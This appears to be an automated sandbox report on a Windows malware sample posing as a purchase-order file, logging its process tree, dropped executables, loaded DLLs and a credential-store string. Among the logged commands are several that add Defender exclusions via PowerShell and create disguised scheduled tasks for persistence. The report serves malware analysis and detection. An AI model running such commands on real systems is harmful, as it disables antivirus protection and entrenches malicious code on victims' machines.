                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeMutant created: \Sessions\1\BaseNamedObjects\IfUvYyLQB
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile created: C:\Users\user\AppData\Local\Temp\tmp29D3.tmpJump to behavior
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: Microsofts.exe, 00000013.00000002.2962626553.000000000260C000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.00000000025EE000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.00000000025FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeReversingLabs: Detection: 42%
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile read: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp"
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"
                          Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\zeXKjViL.exe C:\Users\user\AppData\Roaming\zeXKjViL.exe
                          Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                          Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                          Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                          Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp6E4E.tmp"
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess created: C:\Users\user\AppData\Roaming\zeXKjViL.exe "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess created: C:\Users\user\AppData\Roaming\zeXKjViL.exe "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zeXKjViL.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp"Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp6E4E.tmp"
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess created: C:\Users\user\AppData\Roaming\zeXKjViL.exe "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess created: C:\Users\user\AppData\Roaming\zeXKjViL.exe "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: iconcodecservice.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
